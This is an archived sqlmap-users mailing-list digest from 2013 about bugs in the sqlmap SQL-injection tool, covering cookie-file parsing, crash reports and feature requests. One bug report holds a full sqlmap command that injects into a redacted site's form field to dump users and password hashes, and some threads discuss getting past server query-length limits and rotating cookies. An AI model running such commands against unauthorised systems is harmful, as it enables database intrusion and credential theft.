sqlmap-users

Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1

[B. <sto...@qq...>]

Hi friend,




   Could you help me with this bug ?




[22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u *********************************************** --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft SQL Server --users --passwords
Technique: BOOLEAN
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap", line 87, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
    action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
    conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
  File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in getPasswordHashes
    if user in retrievedUsers:
TypeError: unhashable type: 'list'

[*] shutting down at 22:54:12

Thanks 



BOB
  


 




------------------ Original ------------------
From:  "sqlmap-users-request"<sql...@li...>;
Date:  May 29, 2013
To:  "sqlmap-users"<sql...@li...>; 
Subject:  sqlmap-users Digest, Vol 31, Issue 1



Send sqlmap-users mailing list submissions to
	sql...@li...

To subscribe or unsubscribe via the World Wide Web, visit
	https://lists.sourceforge.net/lists/listinfo/sqlmap-users
or, via email, send a message with subject or body 'help' to
	sql...@li...

You can reach the person managing the list at
	sql...@li...

When replying, please edit your Subject line so it is more specific
than "Re: Contents of sqlmap-users digest..."


Today's Topics:

   1. Re: Feature request (David Guimaraes)
   2. Re: --load-cookies (Dirk Wetter)
   3. Re: --load-cookies (Miroslav Stampar)
   4. Re: Patch for /task/<task_id>/delete in	clean_filesystem
      (Miroslav Stampar)
   5. Re: --load-cookies (Dirk Wetter)
   6. --host parameter (co...@5i...)
   7. Sqlmap and direct connect error (???????? ??????)
   8. Re: --host parameter (Miroslav Stampar)
   9. Re: Sqlmap and direct connect error (Miroslav Stampar)
  10. feature request: offline mode for --dns-domain? (buawig)
  11. feature request: --dns-domain for non-root users	(--dns-port)
      (buawig)
  12. Domain credentials (Brian Milliron)
  13. Re: Domain credentials (Brandon Perry)
  14. Re: feature request: offline mode for --dns-domain?
      (Miroslav Stampar)
  15. Re: Domain credentials (Miroslav Stampar)
  16. Re: feature request: fetch DNS queries from DNS server via
      HTTP (buawig)
  17. Re: feature request: fetch DNS queries from DNS server via
      HTTP (Miroslav Stampar)
  18. MySQL error based technique bug (Konrads Smelkovs)
  19. Re: MySQL error based technique bug (Miroslav Stampar)
  20. SQLmap crashing (Phillip Wylie)
  21. Re: SQLmap crashing (Miroslav Stampar)
  22. Custom injection payload in POST (Marcell Fodor)
  23. Re: SQLmap crashing (Miroslav Stampar)
  24. I got error on windows (warezhacking)
  25. Appending to a dump (Stephen Shkardoon)
  26. Re: Appending to a dump (Miroslav Stampar)
  27. Re: Appending to a dump (Stephen Shkardoon)
  28. Re: Appending to a dump (Miroslav Stampar)
  29. --ignore-404 ? (buawig)
  30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
      from 1 for 1) (buawig)
  31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
      from 1 for 1) (Miroslav Stampar)
  32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
      from 1 for 1) (Miroslav Stampar)
  33. Re: --ignore-404 ? (Miroslav Stampar)
  34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
  35. Re: BUG...!!!! o.O (Miroslav Stampar)
  36. gun...@gm... wants to follow you. Accept?
      (gun...@gm...)
  37. Direct access to mysql database (Marcell Fodor)
  38. Re: Direct access to mysql database (Miroslav Stampar)
  39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
      (Badoo)
  40. Not getting any sensitive data from database (Marcell Fodor)
  41. Re: Not getting any sensitive data from database
      (Miroslav Stampar)
  42. unhandled exception (kvasilopoulos)
  43. [SQLMAP] Unhandled exception for IPv6
      (e.n...@st...)
  44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
  45. Re: unhandled exception (Miroslav Stampar)
  46. Passing SOAPAction in --header (Brandon Perry)
  47. Re: Passing SOAPAction in --header (Miroslav Stampar)
  48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
  49. Blind SQL Injection question (Guy Dufour)
  50. Re: Blind SQL Injection question (Chris Oakley)
  51. Re: Passing SOAPAction in --header (Brandon Perry)
  52. Re: Passing SOAPAction in --header (Brandon Perry)
  53. Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Alok Kumar)
  54. Re: Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Brandon Perry)
  55. Re: Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Alok Kumar)
  56. Re: Deploy&Create SSH/tunnel with compromised MSSQL	server
      (Brandon Perry)
  57. SQLMAP Bug (Joe O'Hara)
  58. Re: SQLMAP Bug (Miroslav Stampar)
  59. [CRITICAL] (Thai Thao)
  60. Re: [CRITICAL] (Miroslav Stampar)
  61. Providing multiple dbms (Sebastian Nerz)
  62. Re: Providing multiple dbms (Miroslav Stampar)


----------------------------------------------------------------------

Message: 1
Date: Sat, 13 Apr 2013 21:40:39 -0300
From: David Guimaraes <sk...@gm...>
Subject: Re: [sqlmap-users] Feature request
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID:
	<CAJ...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Good question Miroslav.. I tried to think in something that can be
implemented without ruin sqlmap query schema, but I could not come to any
conclusion... =(

The thing is, sqlsus use a different approch to dump the data, making this
kind of thing possible...

The solution that I found in this particular scenario is to use sqlsus,
unfortunately...

Regards.

David


On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <mir...@gm...
> wrote:

> Hi David.
>
> And what do you recommend to be done in case of query with length >
> max_inj_length?
>
> Kind regards,
> Miroslav Stampar
> On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>
>> Hi, I am trying to perform sql injection on a web site but I can not get
>> successful due to a size limitation on the query sent to the server. The
>> server is limiting the size of query in 512 bytes only and sqlmap do not
>> have any customization that allows me to bypass this restriction like
>> sqlsus "max_inj_length" parameter. Sqlsus has a feature called "autoconf"
>> that measure the permited query size.
>>
>> There is some chance to put this kind of feature in sqlmap?
>>
>> Thanks.
>>
>> --
>> David Gomes Guimar?es
>>
>>
>> ------------------------------------------------------------------------------
>> Own the Future-IntelLevel Up Game Demo Contest 2013
>> Rise to greatness in Intel's independent game demo contest.
>> Compete for recognition, cash, and the chance to get your game
>> on Steam. $5K grand prize plus 10 genre and skill prizes.
>> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>


-- 
David Gomes Guimar?es
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 2
Date: Mon, 15 Apr 2013 11:36:37 +0200
From: Dirk Wetter <sp...@dr...>
Subject: Re: [sqlmap-users] --load-cookies
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID: <516...@dr...>
Content-Type: text/plain; charset=ISO-8859-1



On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?

thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:

/usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
Traceback (most recent call last):
  File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
    assert domain_specified == initial_dot
AssertionError

  _warn_unhandled_exception()
[11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')

the 999.. looks strange to me.

>  
>
> On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote:
>
>     Hi Dirk.
>      
>     Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>

that's true but IMO 0 represents just a session cookie. Example:

prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
# HTTP cookie file.
# Generated by Wget on 2013-04-15 11:23:13.
# Edit at your own risk.

.bing.com       TRUE    /       FALSE   1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
.bing.com       TRUE    /       FALSE   1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
.bing.com       TRUE    /       FALSE   1429089794      OrigMUID        333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
.bing.com       TRUE    /       FALSE   1429089794      MUID    333995A69E06630B2EB491169F016314
.bing.com       TRUE    /       FALSE   0       _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
.bing.com       TRUE    /       FALSE   0       _HOP
.bing.com       TRUE    /       FALSE   0       _FS     NU=1
.bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
www.bing.com    FALSE   /       FALSE   1429089794      MUIDB   333995A69E06630B2EB491169F016314

prompt%

Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.

Ok: With the prev rev  ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
cookie only for the first 120 tries.

Cheers, Dirk


>      
>     Kind regards,
>     Miroslav Stampar
>
>
>     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...>> wrote:
>
>
>         Hi Miroslav,
>
>         thx for your prompt answer.
>
>         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>         > Hi Dirk.
>         >
>         > Could you please get the latest revision and retry it again?
>         ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>         The slight difference seems to be that in the case where I didn't supply a cookie
>         sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>         >
>         > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>         >
>         > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>
>         sure, here you go:
>
>         --snip
>         # Netscape HTTP Cookie File
>         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID  \t  <Cookie>
>         [..]
>         --snap
>
>         They are all session cookies. For easier reading here I put some blanks in the line
>         above, in "cookie-file" there aren't any though. Cookies were generated with
>         stompy and a shell script (looks he same as with
>         wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>
>         Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>
>         >
>         > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>
>         see above.
>
>         Cheers,
>
>         Dirk
>
>         >
>         >
>         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> wrote:
>         >
>         >     Hi Miroslav,
>         >
>         >     yes unfortunately.
>         >
>         >     If I omit the cookie line in the request header completely, sqlmap
>         >     seems to take the first cookie issued by the server with set-cookie (and
>         >     put's it silently in).
>         >
>         >     Cheers,
>         >
>         >     Dirk
>         >
>         >
>         >
>         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>         >     > Hi.
>         >     >
>         >     > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>         >     >
>         >     > Kind regards,
>         >     > Miroslav Stampar
>         >     >
>         >     >
>         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
>         >     >
>         >     >
>         >     >     Hi folks,
>         >     >
>         >     >     .... that doesn't work for me. It always uses the cookie supplied
>         >     >     (below in $REQUEST, or if I omit the line in $REQUEST the one
>         >     >     from the 1st server reply is being used)
>         >     >
>         >     >     So what is wrong in here:
>         >     >
>         >     >     cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
>         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>         >     >       --level=2 --risk=2 -r $REQUEST
>         >     >
>         >     >     The content of the file $REQUEST is:
>         >     >
>         >     >     POST <URL> HTTP/1.1
>         >     >     Host: <HOST>
>         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>         >     >     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>         >     >     Accept-Language: en-US,en;q=0.5
>         >     >     Accept-Encoding: gzip, deflate
>         >     >     Referer: <Referer>
>         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>         >     >     Connection: keep-alive
>         >     >     Content-Type: application/x-www-form-urlencoded
>         >     >     Content-Length: 67
>         >     >
>         >     >     <abunchofpostparams>
>         >     >
>         >     >
>         >     >     No hints that cookie-file is not in correct format (I've been through this,
>         >     >     at least I think I so ;) ).
>         >     >
>         >     >     Any insight would be much appreciated.
>         >     >
>         >     >
>         >     >     Cheers,
>         >     >
>         >     >     Dirk
>         >     >
>         >     >
>         >     >     ------------------------------------------------------------------------------
>         >     >     Precog is a next-generation analytics platform capable of advanced
>         >     >     analytics on semi-structured data. The platform includes APIs for building
>         >     >     apps and a phenomenal toolset for data science. Developers can use
>         >     >     our toolset for easy data analysis & visualization. Get a free account!
>         >     >     http://www2.precog.com/precogplatform/slashdotnewsletter
>         >     >     _______________________________________________
>         >     >     sqlmap-users mailing list
>         >     >     sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>>
>         >     >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>         >     >
>         >     >
>         >     >
>         >     >
>         >     > --
>         >     > Miroslav Stampar
>         >     > http://about.me/stamparm
>         >
>         >
>         >
>         >
>         > --
>         > Miroslav Stampar
>         > http://about.me/stamparm
>
>
>
>
>     -- 
>     Miroslav Stampar
>     http://about.me/stamparm
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm




------------------------------

Message: 3
Date: Mon, 15 Apr 2013 11:45:19 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] --load-cookies
To: Dirk Wetter <sp...@dr...>
Cc: SqlMap List <sql...@li...>
Message-ID:
	<CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi Dirk.

Now that crash should be "patched".

Could you please retry it now and say if the latest revision suits your
needs?

Kind regards,
Miroslav Stampar


On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:

>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized"
> now. Could you please retry it now?
>
> thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
>     assert domain_specified == initial_dot
> AssertionError
>
>   _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...>> wrote:
> >
> >     Hi Dirk.
> >
> >     Well, I would say that you have an expired cookie. Do you see that
> value 0? That value should be a valid UNIX time representing time of cookie
> expiration. Also, I've just tested that cookie of yours and sqlmap says:
> "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> D=2781203&MS=2781203&AF=NOFORM
> .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
>  333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com       TRUE    /       FALSE   1429089794      MUID
>  333995A69E06630B2EB491169F016314
> .bing.com       TRUE    /       FALSE   0       _SS
> SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com       TRUE    /       FALSE   0       _HOP
> .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix
> time instead of 0 in there.
>
> Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> >     Kind regards,
> >     Miroslav Stampar
> >
> >
> >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >         Hi Miroslav,
> >
> >         thx for your prompt answer.
> >
> >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >         > Hi Dirk.
> >         >
> >         > Could you please get the latest revision and retry it again?
> >         ed5599f: almost the same: with cookie in the header sqlmap takes
> only this one.
> >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> the server anymore.
> >         >
> >         > There was a situation where info messages have been wrongly
> written that original response contained Set-Cookie in situations like
> yours.
> >         >
> >         > In case that everything stays as it is, I'll need to ask you
> to provide more details. For example, cookie file would be great.
> >
> >         sure, here you go:
> >
> >         --snip
> >         # Netscape HTTP Cookie File
> >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
>  \t  <Cookie>
> >         [..]
> >         --snap
> >
> >         They are all session cookies. For easier reading here I put some
> blanks in the line
> >         above, in "cookie-file" there aren't any though. Cookies were
> generated with
> >         stompy and a shell script (looks he same as with
> >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >
> >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> file ;-)
> >
> >         >
> >         > Also, please make sure that the cookie file contains proper
> cookie(s) - domain name should be the same as a domain of target, cookie
> needs to have a proper valid time, etc.
> >
> >         see above.
> >
> >         Cheers,
> >
> >         Dirk
> >
> >         >
> >         >
> >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >         >
> >         >     Hi Miroslav,
> >         >
> >         >     yes unfortunately.
> >         >
> >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >         >     seems to take the first cookie issued by the server with
> set-cookie (and
> >         >     put's it silently in).
> >         >
> >         >     Cheers,
> >         >
> >         >     Dirk
> >         >
> >         >
> >         >
> >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >         >     > Hi.
> >         >     >
> >         >     > And this is also happening if you are skipping "Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> >         >     >
> >         >     > Kind regards,
> >         >     > Miroslav Stampar
> >         >     >
> >         >     >
> >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >         >     >
> >         >     >
> >         >     >     Hi folks,
> >         >     >
> >         >     >     .... that doesn't work for me. It always uses the
> cookie supplied
> >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >         >     >     from the 1st server reply is being used)
> >         >     >
> >         >     >     So what is wrong in here:
> >         >     >
> >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> >         >     >       --level=2 --risk=2 -r $REQUEST
> >         >     >
> >         >     >     The content of the file $REQUEST is:
> >         >     >
> >         >     >     POST <URL> HTTP/1.1
> >         >     >     Host: <HOST>
> >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
> en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >         >     >     Accept-Language: en-US,en;q=0.5
> >         >     >     Accept-Encoding: gzip, deflate
> >         >     >     Referer: <Referer>
> >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >         >     >     Connection: keep-alive
> >         >     >     Content-Type: application/x-www-form-urlencoded
> >         >     >     Content-Length: 67
> >         >     >
> >         >     >     <abunchofpostparams>
> >         >     >
> >         >     >
> >         >     >     No hints that cookie-file is not in correct format
> (I've been through this,
> >         >     >     at least I think I so ;) ).
> >         >     >
> >         >     >     Any insight would be much appreciated.
> >         >     >
> >         >     >
> >         >     >     Cheers,
> >         >     >
> >         >     >     Dirk
> >         >     >
> >         >     >
> >         >     >
> ------------------------------------------------------------------------------
> >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >         >     >     analytics on semi-structured data. The platform
> includes APIs for building
> >         >     >     apps and a phenomenal toolset for data science.
> Developers can use
> >         >     >     our toolset for easy data analysis & visualization.
> Get a free account!
> >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >         >     >     _______________________________________________
> >         >     >     sqlmap-users mailing list
> >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>
> >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >         >     >
> >         >     >
> >         >     >
> >         >     >
> >         >     > --
> >         >     > Miroslav Stampar
> >         >     > http://about.me/stamparm
> >         >
> >         >
> >         >
> >         >
> >         > --
> >         > Miroslav Stampar
> >         > http://about.me/stamparm
> >
> >
> >
> >
> >     --
> >     Miroslav Stampar
> >     http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 4
Date: Mon, 15 Apr 2013 11:46:21 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
	clean_filesystem
To: Brandon Perry <bpe...@gm...>
Cc: sqlmap users <sql...@li...>
Message-ID:
	<CA+9yoX3RNQDm=PqT...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi Brandon.

Thank you for your patch and find it now included [1].

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224


On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...>wrote:

> Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
> call when self.output_directory is NoneType and clean_system() is called.
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 5
Date: Mon, 15 Apr 2013 12:19:13 +0200
From: Dirk Wetter <sp...@dr...>
Subject: Re: [sqlmap-users] --load-cookies
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID: <516...@dr...>
Content-Type: text/plain; charset=ISO-8859-1

Hi Miroslav,

On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your needs?

cool, thx. Works!

However (sorry):

One needs to omit the cookie in the request header, otherwise it just uses the one
supplied by the request.

Then: It doesn't change the cookie. Maybe I was interpreting that not correctly
but my point was using the load-cookies option to direct sqlmap to change
cookies once in a while (whenever that's gonna be). This is to circumvent
restrictions one can encounter otherwise....

Cheers,

Dirk


>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...>> wrote:
>
>
>
>     On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>     > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>
>     thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
>
>     /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
>     Traceback (most recent call last):
>       File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>         assert domain_specified == initial_dot
>     AssertionError
>
>       _warn_unhandled_exception()
>     [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
>     the 999.. looks strange to me.
>
>     >
>     >
>     > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...> <mailto:mir...@gm... <mailto:mir...@gm...>>> wrote:
>     >
>     >     Hi Dirk.
>     >
>     >     Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>     >
>
>     that's true but IMO 0 represents just a session cookie. Example:
>
>     prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com <http://bing.com>
>     # HTTP cookie file.
>     # Generated by Wget on 2013-04-15 11:23:13.
>     # Edit at your own risk.
>
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      OrigMUID        333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      MUID    333995A69E06630B2EB491169F016314
